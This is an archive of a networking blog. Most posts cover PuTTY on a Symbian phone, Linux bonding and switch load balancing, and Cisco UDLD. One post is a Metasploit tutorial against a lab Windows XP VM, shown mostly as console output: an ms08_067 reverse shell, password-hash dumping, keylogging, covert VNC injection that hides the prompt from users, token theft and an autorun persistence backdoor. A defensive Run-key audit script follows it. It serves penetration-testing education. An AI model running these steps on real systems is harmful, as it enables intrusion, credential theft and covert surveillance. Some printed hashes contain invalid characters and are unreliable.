Thursday, March 31, 2011

SSH connection using PuTTY Touch UI on Nokia 5233 (Symbian OS 9.4)

Hey guys, ever felt the need to do some CLI awesomeness on Linux while on the move, with connectivity through a Wi-Fi hotspot or GPRS/EDGE/3G on your Symbian mobile? I have a solution for you.
Our favourite SSH client for Windows, PuTTY, is here to save us on the Symbian platform as well. I am using the PuTTY Touch UI 1.06 (0.8.8) version here on the Nokia 5233 I own. The Nokia 5233 is a decent phone for the price, with a really nice touch interface. It does not have Wi-Fi, so I am using my service provider's GPRS here, which is quite sluggish but enough for an SSH connection.
The touch interface in PuTTY is good for quick operations. The app is really good and not resource hungry.
Just one thing: you cannot multi-task while your SSH connection is established.
Follow some of the screenshots from my mobile, SSH'ed into my laptop, which is connected through a wireless card with SSH port 22 open to public connections.
So as you can see, I can run Metasploit and do some penetration testing on the fly over the SSH connection from my mobile to the Linux box sitting at home. The Linux box is connected to the Internet by a huge pipe, so bandwidth will not be a problem. Believe me, guys, a GPRS connection is quite sufficient for the SSH connection to the Linux box, and from there I can do whatever I want.
Now I can reach my Linux box from almost anywhere through SSH.
SSH to different ports is also supported in the application. Advanced logging features are also present, with logs residing on the mobile phone, including the raw SSH traffic or the printable output.
A random thought just came into my mind: if we could do port forwarding in the application on Symbian OS, so that all traffic is tunnelled to the Linux box through SSH, that would be a more secure connection, as the complete traffic from the mobile to the Linux box would be encrypted, reducing the threats at the service-provider level.
Telnet, though, is not possible from this version of PuTTY. SSHv1 or SSHv2 can be used.
A private key can also be forwarded. Keep-alive intervals can also be configured. Please explore more, guys, and let me know what you think about this.





Saturday, March 26, 2011

LACP/Etherchannel Algorithms & Linux Bonding Modes.

The LACP mode in Enterasys, or the port-channel mode in Cisco, has its own algorithm for selecting which of the slave interfaces involved in the bonding carries a given flow.
As I am a Linux guy, I am more familiar with bonding in the Linux environment.
We can create the bonding in /etc/sysconfig/network/ifcfg-bond0; here we define the master interface with the IP address, then the slave interfaces involved in the bonding, along with the bonding mode.
The switch connected for the bonding also has its own aggregation algorithm, which must match the mode set on the server.
There are 7 bonding modes present in the Linux kernel.

Refer to the bonding documentation in the Linux kernel source; it is available at the following path:
cat /usr/src/linux-2.6.38/Documentation/networking/bonding.txt | less

More verbose information can be found at
http://www.linuxfoundation.org/collaborate/workgroups/networking/bonding

Enterasys :
In Enterasys switches such as the N-series, the LACP LAG output algorithm can be set to one of 3 modes:
DIP-SIP - Destination IP address/Source IP address: slave interfaces are assigned on the basis of the source and destination IP addresses.
DA-SA - Destination MAC address/Source MAC address: slave interfaces are assigned on the basis of the source and destination MAC addresses.
Round-Robin - Equal distribution from the first slave to all slaves in round-robin fashion.

To check the LACP algorithm, use the following on the Enterasys switch:
Matrix N3 Platinum(su)->sh lacp ?
Specifies the lag port(s) to display
outportAlgorithm Shows lacp current ouport algorithm
flowRegeneration Shows lacp flow regeneration state
singleportlag Show single port lag setting
state Show global lag enable state
Matrix N3 Platinum(su)->sh lacp outportAlgorithm
dip-sip
Matrix N3 Platinum(su)->

To set the LACP output algorithm to a different mode:
Matrix N3 Platinum(su)->set lacp outportAlgorithm ?
dip-sip Use sip-dip algorithm for outport determination
da-sa Use da-sa algorithm for outport determination
round-robin Use round-robin algorithm for outport determination
Matrix N3 Platinum(su)->set lacp outportAlgorithm round-robin
Matrix N3 Platinum(su)->

Hence, in accordance with the mode set on the switch, we set the bonding mode in Linux.
After doing this, the LAG groups present will use the round-robin algorithm for flow distribution.
Remember, this is a global configuration, which changes the algorithm of all LAG ports present.
By default, the dip-sip algorithm is configured on Enterasys switches.

Cisco :
On Cisco Catalyst switches, the port-channel can be used in LACP mode for the operation.
The default load-balancing method is src-mac (source MAC address).
Cisco allows us to perform a dry run of the algorithm implemented, using the test command.
I have all interfaces configured in LACP mode (not PAgP).

To check the current algorithm:
Cisco#sh etherchannel load-balance
EtherChannel Load-Balancing Configuration:
src-mac
EtherChannel Load-Balancing Addresses Used Per-Protocol:
Non-IP: Source MAC address
IPv4: Source MAC address
IPv6: Source MAC address
Cisco#

To test which member link the EtherChannel algorithm would select for a given pair of MAC addresses:
Cisco#test etherchannel load-balance interface port-channel 1 mac 00:18:17:F1:F9:C4 E4:9F:16:C5:11:56
Would select Gi1/0/1 of Po1
Cisco#

With an IP-based method, we can pass IP addresses to the test command in the same way.
To see the EtherChannel algorithms available:
Cisco(config)#port-channel load-balance ?
dst-ip Dst IP Addr
dst-mac Dst Mac Addr
src-dst-ip Src XOR Dst IP Addr
src-dst-mac Src XOR Dst Mac Addr
src-ip Src IP Addr
src-mac Src Mac Addr
Cisco(config)#port-channel load-balance

Here we can see the src-dst-ip and src-dst-mac options, which induce additional randomization by XOR-ing the source and destination fields together.
Hence, the load balancing can be done on the destination IP address, the source IP address, or both; the same goes for the MAC addresses.

To set a new algorithm:
Cisco(config)#port-channel load-balance dst-mac
Cisco(config)#

Now the load balancing will be done on the destination MAC address. I will do some more research on this and update the post.
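As an added example (not from the post or any vendor), here is a Python model of the XOR-based hashing on both sides of the link: the Linux bonding xmit_hash_policy formulas as documented in bonding.txt (layer2, layer2+3, layer3+4), and a model of the Cisco port-channel load-balance keywords shown above. The 8-bucket mapping for the Cisco side is my simplification modelled on Cisco's documentation, not the switch's exact ASIC hash; the traffic set is constructed to show why one server talking to many clients behind a single router collapses onto one member link under src-mac or dst-mac, while src-dst-ip spreads the flows.

```python
import ipaddress
import random
from collections import Counter


def _mac(mac):
    """MAC address string (00:11:22:33:44:55, 00-11-..., or 0011.2233.4455) -> int."""
    return int(mac.replace(":", "").replace("-", "").replace(".", ""), 16)


def _ip(ip):
    return int(ipaddress.ip_address(ip))


def linux_slave(policy, flow, slaves):
    """Slave index chosen by the Linux bonding xmit_hash_policy formulas
    as documented in Documentation/networking/bonding.txt."""
    mac_xor = _mac(flow["src_mac"]) ^ _mac(flow["dst_mac"])
    ip_xor = (_ip(flow["src_ip"]) ^ _ip(flow["dst_ip"])) & 0xFFFF
    if policy == "layer2":
        return mac_xor % slaves
    if policy == "layer2+3":
        return (ip_xor ^ mac_xor) % slaves
    if policy == "layer3+4":
        return ((flow["src_port"] ^ flow["dst_port"]) ^ ip_xor) % slaves
    raise ValueError("unknown policy: " + policy)


# Field(s) each Cisco 'port-channel load-balance' keyword feeds into the XOR.
CISCO_POLICIES = {
    "src-mac": ("src_mac",), "dst-mac": ("dst_mac",), "src-dst-mac": ("src_mac", "dst_mac"),
    "src-ip": ("src_ip",), "dst-ip": ("dst_ip",), "src-dst-ip": ("src_ip", "dst_ip"),
}


def cisco_link(policy, flow, links):
    """Member link chosen by a model of the Catalyst algorithm (assumption, simplified):
    XOR the selected fields, keep the 3 low-order bits (8 hash buckets) and deal the
    buckets out to the member links in turn, so 3 links get a 3:3:2 share."""
    value = 0
    for name in CISCO_POLICIES[policy]:
        value ^= _mac(flow[name]) if name.endswith("mac") else _ip(flow[name])
    return (value & 0x7) % links


def distribution(select, flows, links):
    """Number of flows landing on each member link for a given selection function."""
    counts = Counter(select(flow) for flow in flows)
    return [counts.get(i, 0) for i in range(links)]


def sample_flows(count=64):
    """Constructed traffic: one web server answering `count` clients that all sit
    behind the same router, so every frame carries the same source and destination
    MAC and only the client IP and (pseudo-random, seeded) client port vary."""
    rng = random.Random(7)
    return [
        {
            "src_mac": "00:50:56:aa:bb:02", "dst_mac": "00:1a:2b:3c:4d:5e",
            "src_ip": "192.168.1.10", "dst_ip": "10.0.0.%d" % i,
            "src_port": 80, "dst_port": rng.randrange(1024, 65535),
        }
        for i in range(1, count + 1)
    ]


if __name__ == "__main__":
    flows = sample_flows()
    for policy in CISCO_POLICIES:
        dist = distribution(lambda f: cisco_link(policy, f, 2), flows, 2)
        print("Cisco %-12s 2 links  -> %s" % (policy, dist))
    for policy in ("layer2", "layer2+3", "layer3+4"):
        dist = distribution(lambda f: linux_slave(policy, f, 2), flows, 2)
        print("Linux %-12s 2 slaves -> %s" % (policy, dist))
```

The same collapse happens with the server-side bond under layer2, which is why a host that only ever talks to one gateway gains nothing from a MAC-only policy.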

Tuesday, March 22, 2011

Metasploit - 101 with Meterpreter Payload & VNC Injection

The Metasploit framework is well known in the realm of exploit development. It is a standalone tool for security researchers, penetration testers and IDS/IPS developers. As of now, it has 640 exploit definitions and 215 payloads for injection—a huge database. This article focuses on advanced features of the Metasploit framework.


The vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability used here is ms08_067_netapi (just for demonstration purposes; any vulnerability, including Web-based exploits, can be used here to gain shell access to the system). I am running XP SP3 as a virtual machine under Oracle VirtualBox 4.0.


101 with Meterpreter payload


The Meta-Interpreter payload is quite a useful payload provided by Metasploit. It can do a lot of things on the target system. It can be injected as follows.


The Windows target system IP address is 192.168.56.101, and the host OS is Ubuntu 9.10 with the IP address 192.168.56.1. Hence, RHOST is set to 192.168.56.101 and LHOST to 192.168.56.1. The reverse_tcp type of Meterpreter payload will throw the shell back to the host system. The Meterpreter session will open after successful exploitation.


Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.56.101   yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST     192.168.56.1     yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >


Important commands in the Meterpreter session


checkvm
Entering this will check whether the target is a virtual machine. This is quite useful in environments with a large virtual infrastructure: think of a case where the process implementing OS-level virtualisation (OpenVZ) on the physical server has been compromised, giving access to all virtual machines running on it.


Terminal Output :
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >


getcountermeasure
Entering this will enumerate the countermeasures deployed on the target system. This is important because there may be a signature-detection system deployed on the target. It also reports firewall policies and anti-virus software.


Terminal Output :
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]         Domain profile configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]         Exception mode                     = Enable
[*]
[*]         Standard profile configuration (current):
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Disable
[*]         Exception mode                    = Enable
[*]
[*]         Local Area Connection firewall configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >


get_local_subnets
Entering this will give information about the local subnets to which the target system belongs. This is useful for learning about other systems running in the same subnet.


Terminal Output :
meterpreter > run get_local_subnets
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >


get_application_list
Now, this is very cool. It gives us the whole list of applications installed on the target system, with their versions. We can use this to find specific vulnerabilities in the application version, for further exploitation.


Terminal Output :
meterpreter > run get_application_list
Installed Applications
======================
Name                                                            Version
-------                                                              ----------
Adobe AIR                                                    1.5.3.9120
Adobe Flash Player 10 Plugin                              10.0.45.2
Adobe Shockwave Player 11.5                            11.5.7.609
Acrobat.com                                                 2.0.0.0
ImgBurn                                                        2.4.3.0
Mozilla Firefox (3.5.9)                                 3.5.9 (en-US)
Notepad++                                                   5.5
NetBeans IDE 6.7.1                                            6.7.1
Overlook Fing                                                    1.3
TrueCrypt                                                    6.2
Wireshark 1.0.7                                                   1.0.7
WinPcap 4.1.1                                                     4.1.0.1753
Google Toolbar for Internet Explorer        1.0.0
Microsoft .NET Framework 3.0                 3.0.04506.30
Java Auto Updater                                      2.0.2.1
Microsoft .NET Framework 2.0                 2.0.50727
Java(TM) 6 Update 20                                6.0.200
HTTP Analyzer V5.2.1                               5.2.1
Acrobat.com                                                 2.0.0
Java DB 10.4.2.1                                         10.4.2.1
meterpreter >


credcollect
This dumps all the hashes present for the administrator and users. Later on, these hashes can be used to impersonate users, or passwords can be computed by brute-forcing them.


Terminal Output :
meterpreter > run credcollect
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

hashdump
Hashes for all users can also be dumped separately, to gain access, or for privilege escalation.

Terminal Output :
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >

keylogrecorder
This will log all keystrokes made on the target system to the .msf directory. The script migrates the payload into the Explorer process, displays the PID of that process, and starts logging keystrokes. The getpid command shows which process the payload is attached to.
The keystrokes are recorded in a text file at the path shown in the output.

Terminal output :
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >

shell
This will throw back a shell to the host OS. Now we can run whatever we want—having shell access compromises the whole system:

Terminal output :
meterpreter > shell
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >

Other features are also present in the Meterpreter payload, such as the downloading and uploading of files. This can be used to create automated exploit modules with Meterpreter.

Remote VNC injection
Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely and have the display thrown back to the host system. Users of the target system will not notice that their display is being shared, though there is a trick—we have to disable the Metasploit courtesy shell, which appears on the target system's display. If the courtesy shell is not disabled, a blue command prompt window is shown at the time of exploitation, as in Figure 1. This can warn the users of the target system and result in the attack being detected. After disabling the courtesy shell, the blue prompt is not displayed, as you can see in Figure 2. VNC injection can also be used when no user is logged in; in that case, don't bother to disable the courtesy shell.

A VNC viewer must be installed on the host system to see the VNC session thrown back by the target system. I have xtightvncviewer installed on my Ubuntu 9.10 host. The VNCHOST parameter is set to 127.0.0.1 by default; we have to change it to the IP of the host interface on which the VNC session will be spawned—i.e., 192.168.56.1.

Terminal Output :
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
AUTOVNC   true             yes       Automatically launch VNC viewer if present
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
VNCPORT   5900             yes       The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.56.101   yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
AUTOVNC   true             yes       Automatically launch VNC viewer if present
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST     192.168.56.1     yes       The listen address
LPORT     4444             yes       The listen port
VNCHOST   192.168.56.1     yes       The local host to use for the VNC proxy
VNCPORT   5900             yes       The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >

Figure 1: VNC injection with the courtesy shell enabled (the default)

Figure 2: VNC injection with the courtesy shell disabled

Please click on the images for full-scale resolution.


Meterpreter incognito mode
The Incognito extension of Meterpreter is used to impersonate user tokens, to achieve privilege escalation and to maintain access to the system. It lets us execute jobs with the access privileges of the impersonated user. We can also get the process list with the ps command in Meterpreter, and with steal_token <pid> we can raise our privileges to those of the process owner. Incognito mode helps us gain access to the parts of the system that are only accessible to users or administrators with higher privileges than the compromised user.

Terminal output :
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >

Meterpreter persistence mode
The persistence script is useful for keeping access to the system for further exploitation; it is like planting your own back door for later access. A Visual Basic script gets installed on the target system and registered in the autorun keys, so it keeps making connections to the host IP configured at the time of the first exploitation: every time the user logs in, the script throws a shell back to the configured remote IP.

Terminal Output :
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.56.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >

Persistence parameters

run persistence -U -i 5 -p 443 -r 192.168.56.1
-U = automatically start the agent when the user logs in.
-i = interval between each connection attempt to the configured remote IP address.
-p = port to reach on the remote IP address for the Metasploit connection; i.e. the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r = reachable remote IP address where the handler is listening.

Moving on, we just need to load the simpler generic handler module with the reverse_tcp payload and wait for the Meterpreter shell to appear. This stub module provides an interface for handling the incoming connection. At the time of deploying the persistence script, remember to note the clean-up resource file. This script could be dangerous, as it leaves traces on the target system: be sure to clean it up after exploitation. The script file and registry entry can be cleared when access to the target system is no longer required.

Terminal Output :
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     192.168.56.1     yes       The listen address
LPORT     443              yes       The listen port
Exploit target:
Id  Name
--  ----
0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >
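From the defender's side, the trace this persistence leaves is visible in the per-user Run key, and the entry above has three tells: the target lives in a temp directory, it is a script rather than an installed executable, and the value name is random. As an added example (not from the article or the Metasploit project), here is a Python audit of constructed Run-key values modelled on that output; the rules and thresholds are my assumptions for illustration, not a vendor signature.

```python
import re

# Constructed sample of values under HKCU\...\CurrentVersion\Run. The first entry
# is the one the persistence script above created (name and path from the post);
# the rest are made-up benign and suspicious entries for contrast.
SAMPLE_RUN_VALUES = {
    "jwaGgfooIEPNZ": r"C:\WINDOWS\TEMP\qabWKT.vbs",
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    "swg": r'"C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"',
    "updater": r'cscript.exe //B "C:\Documents and Settings\subodh\Local Settings\Temp\upd.js"',
}

SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# Matches \WINDOWS\TEMP\, ...\Local Settings\Temp\ and ...\AppData\Local\Temp\ (lower-cased).
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")


def _tokens(command):
    """Split a Run value into its arguments, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def looks_random(name):
    """Heuristic (assumption): letters only, 8+ chars, at least three upper/lower flips,
    which is what a generated name such as jwaGgfooIEPNZ looks like."""
    if not name.isalpha() or len(name) < 8:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 3


def assess_run_value(name, command):
    """Reasons this autorun entry deserves a look; an empty list means nothing matched."""
    reasons = []
    lowered = command.lower()
    tokens = _tokens(lowered)
    if any(marker in lowered for marker in TEMP_MARKERS):
        reasons.append("target lives in a temp directory")
    if any(t.endswith(SCRIPT_EXTENSIONS) for t in tokens):
        reasons.append("autorun launches a script file")
    if tokens and tokens[0].rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        reasons.append("launcher is a script host or shell")
    if looks_random(name):
        reasons.append("random-looking value name")
    return reasons


def audit(run_values):
    """Map of value name -> reasons, for every entry that tripped at least one rule."""
    findings = {}
    for name, command in run_values.items():
        reasons = assess_run_value(name, command)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_RUN_VALUES).items():
        print("%-16s %s" % (name, "; ".join(reasons)))
```

The same rules apply to the HKLM Run keys and the per-user Startup folder; the cleanup .rc file noted above tells you exactly which value and file a given run created.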

That's all for now, but this is just a start to the endless possibilities for exploitation. I will be back soon with more exciting stuff for you guys.

References
http://www.offensive-security.com/metasploit-unleashed/

Note: This article was published by me in the Linux For You magazine, February 2011 issue. Linux For You is the leading open-source and Linux magazine in the Asia region.

Tuesday, March 8, 2011

Cisco UDLD - Unidirectional Link Detection Protocol

UDLD is a Cisco proprietary protocol for detecting transmit/receive link failures.
It can be used on both fiber links and copper links.
For fiber it is obvious that there is no need for a loop, because light as a carrying medium doesn't require a closed circuit to operate; copper, i.e. twisted-pair communication, requires a loop, as the circuit needs to be closed.
It works by sending UDLD packets to a multicast MAC address as the destination, with its own device and port ID encapsulated. If it doesn't get an echo of its packet, the link is considered unidirectional.
This protocol is only for point-to-point links, not for multi-point environments.
It can also detect a single link failure at the remote end when media converters are deployed between the nodes, since the media converters are not able to propagate the fault detection of a single link failure. Both switches involved in UDLD send out UDLD advertisements.

By default, UDLD is disabled on all interfaces. We can enable UDLD on devices as follows.

Switch(config)# interface f0/7
Switch(config-if)# udld port

Also set this on the interface connected to this respective interface on the other switch.
After that, we can check that the local switch interface has detected its neighbor and updated the link's status to bidirectional.

Switch# show udld f0/7
Interface Fa0/7
---
Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Bidirectional
Current operational state: Advertisement - Single neighbor detected
Message interval: 15
Time out interval: 5
Entry 1
---
Expiration time: 40
Device ID: 1
Current neighbor state: Bidirectional
Device name: CAT0746Z1WN
Port ID: Fa0/16
Neighbor echo 1 device: CAT1042NJ69
Neighbor echo 1 port: Fa0
Message interval: 15
Time out interval: 5
CDP Device name: S2

Normal mode can take 15 + 5 = 20 seconds to react to a link fault (message interval: 15, timeout interval: 5).
In normal mode, link failure detection doesn't put the port into the disabled state; this results in devices still trying to transmit on faulty links. To overcome this we can use aggressive mode.
Normal mode can detect fiber mis-connection problems, such as a single strand broken or not connected.
In aggressive mode, if a link is detected as unidirectional, that interface is placed into the error-disabled state. This state is much more noticeable to administrators.
To enable UDLD in aggressive mode, use the following on both ends of the link.

Switch(config)# interface f0/7
Switch(config-if)# udld port aggressive

We can verify that UDLD is now operating in aggressive mode:

Switch# show udld f0/7
Interface Fa0/13
---
Port enable administrative configuration setting: Enabled / in aggressive mode
Port enable operational state: Enabled / in aggressive mode
Current bidirectional state: Bidirectional
Current operational state: Advertisement - Single neighbor detected
Message interval: 7
Time out interval: 5
Entry 1
---
Expiration time: 43
Device ID: 1
Current neighbor state: Bidirectional
Device name: CAT0746Z1WN
Port ID: Fa0/16
Neighbor echo 1 device: CAT1042NJ69
Neighbor echo 1 port: Fa0/7
Message interval: 15
Time out interval: 5
CDP Device name: S2

A port disabled by the err-disabled condition will show status down in the show interface output.
After resolving the error condition, we can restore that interface to normal operation by toggling it with "shutdown" and "no shutdown" in interface configuration, or by issuing the udld reset command, which resets all ports taken down by UDLD.

Switch# udld reset
1 ports shutdown by UDLD were reset.
